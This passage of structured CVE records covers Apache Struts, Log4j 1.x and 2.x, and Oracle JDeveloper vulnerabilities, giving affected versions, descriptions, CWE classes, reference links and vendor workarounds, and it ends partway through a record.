"https://softwaresupport.hpe.com>.", }, { trust: 0.1, url: "https://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facets", }, { trust: 0.1, url: "http://www.hpe.com/support/security_bulletin_archive", }, { trust: 0.1, url: "https://www.hpe.com/info/report-security-vulnerability", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2016-0763", }, { trust: 0.1, url: "http://www.hpe.com/support/subscriber_choice", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2015-3253", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2014-0107", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2013-6429", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2014-0050", }, { trust: 0.1, url: "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c01345499", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2015-5652", }, { trust: 0.1, url: "http://twitter.com/rgielen", }, { trust: 0.1, url: "http://struts.apache.org/struts1eol-announcement.html", }, { trust: 0.1, url: "http://h30499.www3.hp.com/t5/hp-security-research-blog/protect-your-struts1-applications/ba-p/6463188#.u2j7xeasxro", }, ], sources: [ { db: "BID", id: "67121", }, { db: "PACKETSTORM", id: "149311", }, { db: "PACKETSTORM", id: "126619", }, { db: "PACKETSTORM", id: "126692", }, { db: "PACKETSTORM", id: "149050", }, { db: "PACKETSTORM", id: "127868", }, { db: "PACKETSTORM", id: "137980", }, { db: "PACKETSTORM", id: "154792", }, { db: "PACKETSTORM", id: "128873", }, { db: "PACKETSTORM", id: "139721", }, { db: "PACKETSTORM", id: "126455", }, { db: "CNNVD", id: "CNNVD-201404-581", }, { db: "NVD", id: "CVE-2014-0114", }, ], }, sources: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", data: { "@container": "@list", }, }, data: [ { db: "VULMON", id: "CVE-2014-0114", }, { db: "BID", id: "67121", }, { db: "PACKETSTORM", id: "149311", }, { db: "PACKETSTORM", id: "126619", }, { db: "PACKETSTORM", id: "126692", }, { db: 
"PACKETSTORM", id: "149050", }, { db: "PACKETSTORM", id: "127868", }, { db: "PACKETSTORM", id: "137980", }, { db: "PACKETSTORM", id: "154792", }, { db: "PACKETSTORM", id: "128873", }, { db: "PACKETSTORM", id: "139721", }, { db: "PACKETSTORM", id: "126455", }, { db: "CNNVD", id: "CNNVD-201404-581", }, { db: "NVD", id: "CVE-2014-0114", }, ], }, sources_release_date: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", data: { "@container": "@list", }, }, data: [ { date: "2014-04-30T00:00:00", db: "VULMON", id: "CVE-2014-0114", }, { date: "2014-04-29T00:00:00", db: "BID", id: "67121", }, { date: "2018-09-11T15:41:48", db: "PACKETSTORM", id: "149311", }, { date: "2014-05-14T19:25:00", db: "PACKETSTORM", id: "126619", }, { date: "2014-05-19T03:19:48", db: "PACKETSTORM", id: "126692", }, { date: "2018-08-23T17:19:18", db: "PACKETSTORM", id: "149050", }, { date: "2014-08-14T22:49:43", db: "PACKETSTORM", id: "127868", }, { date: "2016-07-20T18:29:00", db: "PACKETSTORM", id: "137980", }, { date: "2019-10-10T14:43:55", db: "PACKETSTORM", id: "154792", }, { date: "2014-10-28T18:09:30", db: "PACKETSTORM", id: "128873", }, { date: "2016-11-15T00:42:48", db: "PACKETSTORM", id: "139721", }, { date: "2014-05-03T02:09:52", db: "PACKETSTORM", id: "126455", }, { date: "2014-04-30T00:00:00", db: "CNNVD", id: "CNNVD-201404-581", }, { date: "2014-04-30T10:49:03.973000", db: "NVD", id: "CVE-2014-0114", }, ], }, sources_update_date: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", data: { "@container": "@list", }, }, data: [ { date: "2023-02-13T00:00:00", db: "VULMON", id: "CVE-2014-0114", }, { date: "2019-07-17T07:00:00", db: "BID", id: "67121", }, { date: "2023-04-14T00:00:00", db: "CNNVD", id: "CNNVD-201404-581", }, { date: "2024-11-21T02:01:23.960000", db: "NVD", id: "CVE-2014-0114", }, ], }, threat_type: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", sources: { "@container": "@list", "@context": { 
"@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "remote", sources: [ { db: "PACKETSTORM", id: "126619", }, { db: "PACKETSTORM", id: "126692", }, { db: "PACKETSTORM", id: "149050", }, { db: "PACKETSTORM", id: "137980", }, { db: "CNNVD", id: "CNNVD-201404-581", }, ], trust: 1, }, title: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Apache Struts Input validation error vulnerability", sources: [ { db: "CNNVD", id: "CNNVD-201404-581", }, ], trust: 0.6, }, type: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "input validation error", sources: [ { db: "CNNVD", id: "CNNVD-201404-581", }, ], trust: 0.6, }, }
cve-2021-45105
Vulnerability from cvelistv5
Vendor | Product | Version |
---|---|---|
Apache Software Foundation | Apache Log4j2 | log4j-core < 2.17.0 |
{ containers: { adp: [ { providerMetadata: { dateUpdated: "2024-08-04T04:39:20.295Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://logging.apache.org/log4j/2.x/security.html", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032", }, { name: "VU#930724", tags: [ "third-party-advisory", "x_refsource_CERT-VN", "x_transferred", ], url: "https://www.kb.cert.org/vuls/id/930724", }, { name: "20211210 Vulnerabilities in Apache Log4j Library Affecting Cisco Products: December 2021", tags: [ "vendor-advisory", "x_refsource_CISCO", "x_transferred", ], url: "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd", }, { name: "[oss-security] 20211218 CVE-2021-45105: Apache Log4j2 does not always protect from infinite recursion in lookup evaluation", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "http://www.openwall.com/lists/oss-security/2021/12/19/1", }, { name: "DSA-5024", tags: [ "vendor-advisory", "x_refsource_DEBIAN", "x_transferred", ], url: "https://www.debian.org/security/2021/dsa-5024", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://cert-portal.siemens.com/productcert/pdf/ssa-479842.pdf", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://security.netapp.com/advisory/ntap-20211218-0001/", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.zerodayinitiative.com/advisories/ZDI-21-1541/", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://cert-portal.siemens.com/productcert/pdf/ssa-501673.pdf", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpujan2022.html", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { tags: [ 
"x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpujul2022.html", }, ], title: "CVE Program Container", }, ], cna: { affected: [ { product: "Apache Log4j2", vendor: "Apache Software Foundation", versions: [ { changes: [ { at: "2.13.0", status: "affected", }, { at: "2.12.3", status: "unaffected", }, { at: "2.4", status: "affected", }, { at: "2.3.1", status: "unaffected", }, { at: "2.0-alpha1", status: "affected", }, ], lessThan: "2.17.0", status: "affected", version: "log4j-core", versionType: "custom", }, ], }, ], credits: [ { lang: "en", value: "Independently discovered by Hideki Okamoto of Akamai Technologies, Guy Lederfein of Trend Micro Research working with Trend Micro’s Zero Day Initiative, and another anonymous vulnerability researcher", }, ], descriptions: [ { lang: "en", value: "Apache Log4j2 versions 2.0-alpha1 through 2.16.0 (excluding 2.12.3 and 2.3.1) did not protect from uncontrolled recursion from self-referential lookups. This allows an attacker with control over Thread Context Map data to cause a denial of service when a crafted string is interpreted. 
This issue was fixed in Log4j 2.17.0, 2.12.3, and 2.3.1.", }, ], metrics: [ { other: { content: { other: "high", }, type: "unknown", }, }, ], problemTypes: [ { descriptions: [ { cweId: "CWE-20", description: "CWE-20 Improper Input Validation", lang: "en", type: "CWE", }, ], }, { descriptions: [ { cweId: "CWE-674", description: "CWE-674: Uncontrolled Recursion", lang: "en", type: "CWE", }, ], }, ], providerMetadata: { dateUpdated: "2022-07-25T16:41:57", orgId: "f0158376-9dc2-43b6-827c-5f631a4d8d09", shortName: "apache", }, references: [ { tags: [ "x_refsource_MISC", ], url: "https://logging.apache.org/log4j/2.x/security.html", }, { tags: [ "x_refsource_CONFIRM", ], url: "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032", }, { name: "VU#930724", tags: [ "third-party-advisory", "x_refsource_CERT-VN", ], url: "https://www.kb.cert.org/vuls/id/930724", }, { name: "20211210 Vulnerabilities in Apache Log4j Library Affecting Cisco Products: December 2021", tags: [ "vendor-advisory", "x_refsource_CISCO", ], url: "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd", }, { name: "[oss-security] 20211218 CVE-2021-45105: Apache Log4j2 does not always protect from infinite recursion in lookup evaluation", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "http://www.openwall.com/lists/oss-security/2021/12/19/1", }, { name: "DSA-5024", tags: [ "vendor-advisory", "x_refsource_DEBIAN", ], url: "https://www.debian.org/security/2021/dsa-5024", }, { tags: [ "x_refsource_CONFIRM", ], url: "https://cert-portal.siemens.com/productcert/pdf/ssa-479842.pdf", }, { tags: [ "x_refsource_CONFIRM", ], url: "https://security.netapp.com/advisory/ntap-20211218-0001/", }, { tags: [ "x_refsource_MISC", ], url: "https://www.zerodayinitiative.com/advisories/ZDI-21-1541/", }, { tags: [ "x_refsource_CONFIRM", ], url: "https://cert-portal.siemens.com/productcert/pdf/ssa-501673.pdf", }, { tags: [ "x_refsource_MISC", ], url: 
"https://www.oracle.com/security-alerts/cpujan2022.html", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/security-alerts/cpujul2022.html", }, ], source: { defect: [ "LOG4J2-3230", ], discovery: "UNKNOWN", }, title: "Apache Log4j2 does not always protect from infinite recursion in lookup evaluation", workarounds: [ { lang: "en", value: "Implement one of the following mitigation techniques:\n\n* Java 8 (or later) users should upgrade to release 2.17.0.\n\nAlternatively, this can be mitigated in configuration:\n\n* In PatternLayout in the logging configuration, replace Context Lookups like `${ctx:loginId}` or `$${ctx:loginId}` with Thread Context Map patterns (%X, %mdc, or %MDC).\n* Otherwise, in the configuration, remove references to Context Lookups like `${ctx:loginId}` or `$${ctx:loginId}` where they originate \nfrom sources external to the application such as HTTP headers or user input.", }, ], x_generator: { engine: "Vulnogram 0.0.9", }, x_legacyV4Record: { CVE_data_meta: { ASSIGNER: "security@apache.org", ID: "CVE-2021-45105", STATE: "PUBLIC", TITLE: "Apache Log4j2 does not always protect from infinite recursion in lookup evaluation", }, affects: { vendor: { vendor_data: [ { product: { product_data: [ { product_name: "Apache Log4j2", version: { version_data: [ { version_affected: "<", version_name: "log4j-core", version_value: "2.17.0", }, { version_affected: ">=", version_name: "log4j-core", version_value: "2.13.0", }, { version_affected: "<", version_name: "log4j-core", version_value: "2.12.3", }, { version_affected: ">=", version_name: "log4j-core", version_value: "2.4", }, { version_affected: "<", version_name: "log4j-core", version_value: "2.3.1", }, { version_affected: ">=", version_name: "log4j-core", version_value: "2.0-alpha1", }, ], }, }, ], }, vendor_name: "Apache Software Foundation", }, ], }, }, credit: [ { lang: "eng", value: 
"Independently discovered by Hideki Okamoto of Akamai Technologies, Guy Lederfein of Trend Micro Research working with Trend Micro’s Zero Day Initiative, and another anonymous vulnerability researcher", }, ], data_format: "MITRE", data_type: "CVE", data_version: "4.0", description: { description_data: [ { lang: "eng", value: "Apache Log4j2 versions 2.0-alpha1 through 2.16.0 (excluding 2.12.3 and 2.3.1) did not protect from uncontrolled recursion from self-referential lookups. This allows an attacker with control over Thread Context Map data to cause a denial of service when a crafted string is interpreted. This issue was fixed in Log4j 2.17.0, 2.12.3, and 2.3.1.", }, ], }, generator: { engine: "Vulnogram 0.0.9", }, impact: [ { other: "high", }, ], problemtype: { problemtype_data: [ { description: [ { lang: "eng", value: "CWE-20 Improper Input Validation", }, ], }, { description: [ { lang: "eng", value: "CWE-674: Uncontrolled Recursion", }, ], }, ], }, references: { reference_data: [ { name: "https://logging.apache.org/log4j/2.x/security.html", refsource: "MISC", url: "https://logging.apache.org/log4j/2.x/security.html", }, { name: "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032", refsource: "CONFIRM", url: "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032", }, { name: "VU#930724", refsource: "CERT-VN", url: "https://www.kb.cert.org/vuls/id/930724", }, { name: "20211210 Vulnerabilities in Apache Log4j Library Affecting Cisco Products: December 2021", refsource: "CISCO", url: "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd", }, { name: "[oss-security] 20211218 CVE-2021-45105: Apache Log4j2 does not always protect from infinite recursion in lookup evaluation", refsource: "MLIST", url: "http://www.openwall.com/lists/oss-security/2021/12/19/1", }, { name: "DSA-5024", refsource: "DEBIAN", url: "https://www.debian.org/security/2021/dsa-5024", }, { name: 
"https://cert-portal.siemens.com/productcert/pdf/ssa-479842.pdf", refsource: "CONFIRM", url: "https://cert-portal.siemens.com/productcert/pdf/ssa-479842.pdf", }, { name: "https://security.netapp.com/advisory/ntap-20211218-0001/", refsource: "CONFIRM", url: "https://security.netapp.com/advisory/ntap-20211218-0001/", }, { name: "https://www.zerodayinitiative.com/advisories/ZDI-21-1541/", refsource: "MISC", url: "https://www.zerodayinitiative.com/advisories/ZDI-21-1541/", }, { name: "https://cert-portal.siemens.com/productcert/pdf/ssa-501673.pdf", refsource: "CONFIRM", url: "https://cert-portal.siemens.com/productcert/pdf/ssa-501673.pdf", }, { name: "https://www.oracle.com/security-alerts/cpujan2022.html", refsource: "MISC", url: "https://www.oracle.com/security-alerts/cpujan2022.html", }, { name: "https://www.oracle.com/security-alerts/cpuapr2022.html", refsource: "MISC", url: "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { name: "https://www.oracle.com/security-alerts/cpujul2022.html", refsource: "MISC", url: "https://www.oracle.com/security-alerts/cpujul2022.html", }, ], }, source: { defect: [ "LOG4J2-3230", ], discovery: "UNKNOWN", }, work_around: [ { lang: "en", value: "Implement one of the following mitigation techniques:\n\n* Java 8 (or later) users should upgrade to release 2.17.0.\n\nAlternatively, this can be mitigated in configuration:\n\n* In PatternLayout in the logging configuration, replace Context Lookups like `${ctx:loginId}` or `$${ctx:loginId}` with Thread Context Map patterns (%X, %mdc, or %MDC).\n* Otherwise, in the configuration, remove references to Context Lookups like `${ctx:loginId}` or `$${ctx:loginId}` where they originate \nfrom sources external to the application such as HTTP headers or user input.", }, ], }, }, }, cveMetadata: { assignerOrgId: "f0158376-9dc2-43b6-827c-5f631a4d8d09", assignerShortName: "apache", cveId: "CVE-2021-45105", datePublished: "2021-12-18T11:55:08", dateReserved: "2021-12-16T00:00:00", dateUpdated: 
"2024-08-04T04:39:20.295Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", }
cve-2017-3255
Vulnerability from cvelistv5
URL | Tags |
---|---|
http://www.securitytracker.com/id/1037631 | vdb-entry, x_refsource_SECTRACK |
http://www.securityfocus.com/bid/95543 | vdb-entry, x_refsource_BID |
http://www.oracle.com/technetwork/security-advisory/cpujan2017-2881727.html | x_refsource_CONFIRM |
Vendor | Product | Version |
---|---|---|
Oracle | JDeveloper | 11.1.1.7.0, 11.1.1.9.0, 11.1.2.4.0, 12.1.3.0.0, 12.2.1.0.0, 12.2.1.1.0, 12.2.1.2.0 |
{ containers: { adp: [ { providerMetadata: { dateUpdated: "2024-08-05T14:23:33.190Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { name: "1037631", tags: [ "vdb-entry", "x_refsource_SECTRACK", "x_transferred", ], url: "http://www.securitytracker.com/id/1037631", }, { name: "95543", tags: [ "vdb-entry", "x_refsource_BID", "x_transferred", ], url: "http://www.securityfocus.com/bid/95543", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "http://www.oracle.com/technetwork/security-advisory/cpujan2017-2881727.html", }, ], title: "CVE Program Container", }, { metrics: [ { other: { content: { id: "CVE-2017-3255", options: [ { Exploitation: "none", }, { Automatable: "yes", }, { "Technical Impact": "partial", }, ], role: "CISA Coordinator", timestamp: "2024-10-09T19:25:28.650509Z", version: "2.0.3", }, type: "ssvc", }, }, ], providerMetadata: { dateUpdated: "2024-10-09T19:41:09.804Z", orgId: "134c704f-9b21-4f2e-91b3-4a467353bcc0", shortName: "CISA-ADP", }, title: "CISA ADP Vulnrichment", }, ], cna: { affected: [ { product: "JDeveloper", vendor: "Oracle", versions: [ { status: "affected", version: "11.1.1.7.0", }, { status: "affected", version: "11.1.1.9.0", }, { status: "affected", version: "11.1.2.4.0", }, { status: "affected", version: "12.1.3.0.0", }, { status: "affected", version: "12.2.1.0.0", }, { status: "affected", version: "12.2.1.1.0", }, { status: "affected", version: "12.2.1.2.0", }, ], }, ], datePublic: "2017-01-17T00:00:00", descriptions: [ { lang: "en", value: "Vulnerability in the Oracle JDeveloper component of Oracle Fusion Middleware (subcomponent: ADF Faces). Supported versions that are affected are 11.1.1.7.0, 11.1.1.9.0, 11.1.2.4.0, 12.1.3.0.0, 12.2.1.0.0, 12.2.1.1.0 and 12.2.1.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle JDeveloper. 
While the vulnerability is in Oracle JDeveloper, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle JDeveloper accessible data. CVSS v3.0 Base Score 5.8 (Confidentiality impacts).", }, ], problemTypes: [ { descriptions: [ { description: "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N", lang: "en", type: "text", }, ], }, ], providerMetadata: { dateUpdated: "2017-07-25T09:57:01", orgId: "43595867-4340-4103-b7a2-9a5208d29a85", shortName: "oracle", }, references: [ { name: "1037631", tags: [ "vdb-entry", "x_refsource_SECTRACK", ], url: "http://www.securitytracker.com/id/1037631", }, { name: "95543", tags: [ "vdb-entry", "x_refsource_BID", ], url: "http://www.securityfocus.com/bid/95543", }, { tags: [ "x_refsource_CONFIRM", ], url: "http://www.oracle.com/technetwork/security-advisory/cpujan2017-2881727.html", }, ], x_legacyV4Record: { CVE_data_meta: { ASSIGNER: "secalert_us@oracle.com", ID: "CVE-2017-3255", STATE: "PUBLIC", }, affects: { vendor: { vendor_data: [ { product: { product_data: [ { product_name: "JDeveloper", version: { version_data: [ { version_value: "11.1.1.7.0", }, { version_value: "11.1.1.9.0", }, { version_value: "11.1.2.4.0", }, { version_value: "12.1.3.0.0", }, { version_value: "12.2.1.0.0", }, { version_value: "12.2.1.1.0", }, { version_value: "12.2.1.2.0", }, ], }, }, ], }, vendor_name: "Oracle", }, ], }, }, data_format: "MITRE", data_type: "CVE", data_version: "4.0", description: { description_data: [ { lang: "eng", value: "Vulnerability in the Oracle JDeveloper component of Oracle Fusion Middleware (subcomponent: ADF Faces). Supported versions that are affected are 11.1.1.7.0, 11.1.1.9.0, 11.1.2.4.0, 12.1.3.0.0, 12.2.1.0.0, 12.2.1.1.0 and 12.2.1.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle JDeveloper. 
While the vulnerability is in Oracle JDeveloper, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle JDeveloper accessible data. CVSS v3.0 Base Score 5.8 (Confidentiality impacts).", }, ], }, problemtype: { problemtype_data: [ { description: [ { lang: "eng", value: "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N", }, ], }, ], }, references: { reference_data: [ { name: "1037631", refsource: "SECTRACK", url: "http://www.securitytracker.com/id/1037631", }, { name: "95543", refsource: "BID", url: "http://www.securityfocus.com/bid/95543", }, { name: "http://www.oracle.com/technetwork/security-advisory/cpujan2017-2881727.html", refsource: "CONFIRM", url: "http://www.oracle.com/technetwork/security-advisory/cpujan2017-2881727.html", }, ], }, }, }, }, cveMetadata: { assignerOrgId: "43595867-4340-4103-b7a2-9a5208d29a85", assignerShortName: "oracle", cveId: "CVE-2017-3255", datePublished: "2017-01-27T22:01:00", dateReserved: "2016-12-06T00:00:00", dateUpdated: "2024-10-09T19:41:09.804Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", }
cve-2005-2292
Vulnerability from cvelistv5
URL | Tags |
---|---|
http://www.red-database-security.com/advisory/oracle_jdeveloper_plaintext_password.html | x_refsource_MISC |
http://secunia.com/advisories/15991/ | third-party-advisory, x_refsource_SECUNIA |
https://exchange.xforce.ibmcloud.com/vulnerabilities/21342 | vdb-entry, x_refsource_XF |
http://www.oracle.com/technology/deploy/security/pdf/cpujul2005.html | x_refsource_CONFIRM |
http://marc.info/?l=bugtraq&m=112129177927502&w=2 | mailing-list, x_refsource_BUGTRAQ |
{ containers: { adp: [ { providerMetadata: { dateUpdated: "2024-08-07T22:22:48.614Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { tags: [ "x_refsource_MISC", "x_transferred", ], url: "http://www.red-database-security.com/advisory/oracle_jdeveloper_plaintext_password.html", }, { name: "15991", tags: [ "third-party-advisory", "x_refsource_SECUNIA", "x_transferred", ], url: "http://secunia.com/advisories/15991/", }, { name: "jdeveloper-config-plaintext-password(21342)", tags: [ "vdb-entry", "x_refsource_XF", "x_transferred", ], url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/21342", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "http://www.oracle.com/technology/deploy/security/pdf/cpujul2005.html", }, { name: "20050713 Advisory: Oracle JDeveloper Plaintext Passwords", tags: [ "mailing-list", "x_refsource_BUGTRAQ", "x_transferred", ], url: "http://marc.info/?l=bugtraq&m=112129177927502&w=2", }, ], title: "CVE Program Container", }, ], cna: { affected: [ { product: "n/a", vendor: "n/a", versions: [ { status: "affected", version: "n/a", }, ], }, ], datePublic: "2005-07-13T00:00:00", descriptions: [ { lang: "en", value: "Oracle JDeveloper 9.0.4, 9.0.5, and 10.1.2 stores cleartext passwords in (1) IDEConnections.xml, (2) XSQLConfig.xml and (3) settings.xml, which allows local users to obtain sensitive information.", }, ], problemTypes: [ { descriptions: [ { description: "n/a", lang: "en", type: "text", }, ], }, ], providerMetadata: { dateUpdated: "2017-07-10T14:57:01", orgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca", shortName: "mitre", }, references: [ { tags: [ "x_refsource_MISC", ], url: "http://www.red-database-security.com/advisory/oracle_jdeveloper_plaintext_password.html", }, { name: "15991", tags: [ "third-party-advisory", "x_refsource_SECUNIA", ], url: "http://secunia.com/advisories/15991/", }, { name: "jdeveloper-config-plaintext-password(21342)", tags: [ "vdb-entry", "x_refsource_XF", ], url: 
"https://exchange.xforce.ibmcloud.com/vulnerabilities/21342", }, { tags: [ "x_refsource_CONFIRM", ], url: "http://www.oracle.com/technology/deploy/security/pdf/cpujul2005.html", }, { name: "20050713 Advisory: Oracle JDeveloper Plaintext Passwords", tags: [ "mailing-list", "x_refsource_BUGTRAQ", ], url: "http://marc.info/?l=bugtraq&m=112129177927502&w=2", }, ], x_legacyV4Record: { CVE_data_meta: { ASSIGNER: "cve@mitre.org", ID: "CVE-2005-2292", STATE: "PUBLIC", }, affects: { vendor: { vendor_data: [ { product: { product_data: [ { product_name: "n/a", version: { version_data: [ { version_value: "n/a", }, ], }, }, ], }, vendor_name: "n/a", }, ], }, }, data_format: "MITRE", data_type: "CVE", data_version: "4.0", description: { description_data: [ { lang: "eng", value: "Oracle JDeveloper 9.0.4, 9.0.5, and 10.1.2 stores cleartext passwords in (1) IDEConnections.xml, (2) XSQLConfig.xml and (3) settings.xml, which allows local users to obtain sensitive information.", }, ], }, problemtype: { problemtype_data: [ { description: [ { lang: "eng", value: "n/a", }, ], }, ], }, references: { reference_data: [ { name: "http://www.red-database-security.com/advisory/oracle_jdeveloper_plaintext_password.html", refsource: "MISC", url: "http://www.red-database-security.com/advisory/oracle_jdeveloper_plaintext_password.html", }, { name: "15991", refsource: "SECUNIA", url: "http://secunia.com/advisories/15991/", }, { name: "jdeveloper-config-plaintext-password(21342)", refsource: "XF", url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/21342", }, { name: "http://www.oracle.com/technology/deploy/security/pdf/cpujul2005.html", refsource: "CONFIRM", url: "http://www.oracle.com/technology/deploy/security/pdf/cpujul2005.html", }, { name: "20050713 Advisory: Oracle JDeveloper Plaintext Passwords", refsource: "BUGTRAQ", url: "http://marc.info/?l=bugtraq&m=112129177927502&w=2", }, ], }, }, }, }, cveMetadata: { assignerOrgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca", assignerShortName: 
"mitre", cveId: "CVE-2005-2292", datePublished: "2005-07-17T04:00:00", dateReserved: "2005-07-17T00:00:00", dateUpdated: "2024-08-07T22:22:48.614Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", }
cve-2021-4104
Vulnerability from cvelistv5
Vendor | Product | Version |
---|---|---|
Apache Software Foundation | Apache Log4j 1.x | Apache Log4j 1.2 1.2.x |
{ containers: { adp: [ { providerMetadata: { dateUpdated: "2024-08-03T17:16:04.172Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { tags: [ "x_transferred", ], url: "https://www.cve.org/CVERecord?id=CVE-2021-44228", }, { tags: [ "x_transferred", ], url: "https://github.com/apache/logging-log4j2/pull/608#issuecomment-990494126", }, { tags: [ "x_transferred", ], url: "https://access.redhat.com/security/cve/CVE-2021-4104", }, { name: "VU#930724", tags: [ "third-party-advisory", "x_transferred", ], url: "https://www.kb.cert.org/vuls/id/930724", }, { name: "[oss-security] 20220118 CVE-2022-23302: Deserialization of untrusted data in JMSSink in Apache Log4j 1.x", tags: [ "mailing-list", "x_transferred", ], url: "http://www.openwall.com/lists/oss-security/2022/01/18/3", }, { tags: [ "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpujan2022.html", }, { tags: [ "x_transferred", ], url: "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0033", }, { tags: [ "x_transferred", ], url: "https://security.netapp.com/advisory/ntap-20211223-0007/", }, { tags: [ "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { tags: [ "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpujul2022.html", }, { name: "GLSA-202209-02", tags: [ "vendor-advisory", "x_transferred", ], url: "https://security.gentoo.org/glsa/202209-02", }, { name: "GLSA-202310-16", tags: [ "vendor-advisory", "x_transferred", ], url: "https://security.gentoo.org/glsa/202310-16", }, { name: "GLSA-202312-02", tags: [ "vendor-advisory", "x_transferred", ], url: "https://security.gentoo.org/glsa/202312-02", }, { name: "GLSA-202312-04", tags: [ "vendor-advisory", "x_transferred", ], url: "https://security.gentoo.org/glsa/202312-04", }, ], title: "CVE Program Container", }, ], cna: { affected: [ { product: "Apache Log4j 1.x", vendor: "Apache Software Foundation", versions: [ { status: "affected", version: "Apache Log4j 
1.2 1.2.x", }, ], }, ], descriptions: [ { lang: "en", value: "JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration. The attacker can provide TopicBindingName and TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-44228. Note this issue only affects Log4j 1.2 when specifically configured to use JMSAppender, which is not the default. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions.", }, ], problemTypes: [ { descriptions: [ { cweId: "CWE-502", description: "CWE-502 Deserialization of Untrusted Data", lang: "en", type: "CWE", }, ], }, ], providerMetadata: { dateUpdated: "2023-12-22T09:06:15.357899", orgId: "f0158376-9dc2-43b6-827c-5f631a4d8d09", shortName: "apache", }, references: [ { url: "https://www.cve.org/CVERecord?id=CVE-2021-44228", }, { url: "https://github.com/apache/logging-log4j2/pull/608#issuecomment-990494126", }, { url: "https://access.redhat.com/security/cve/CVE-2021-4104", }, { name: "VU#930724", tags: [ "third-party-advisory", ], url: "https://www.kb.cert.org/vuls/id/930724", }, { name: "[oss-security] 20220118 CVE-2022-23302: Deserialization of untrusted data in JMSSink in Apache Log4j 1.x", tags: [ "mailing-list", ], url: "http://www.openwall.com/lists/oss-security/2022/01/18/3", }, { url: "https://www.oracle.com/security-alerts/cpujan2022.html", }, { url: "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0033", }, { url: "https://security.netapp.com/advisory/ntap-20211223-0007/", }, { url: "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { url: "https://www.oracle.com/security-alerts/cpujul2022.html", }, { name: "GLSA-202209-02", tags: [ "vendor-advisory", ], url: "https://security.gentoo.org/glsa/202209-02", }, { name: 
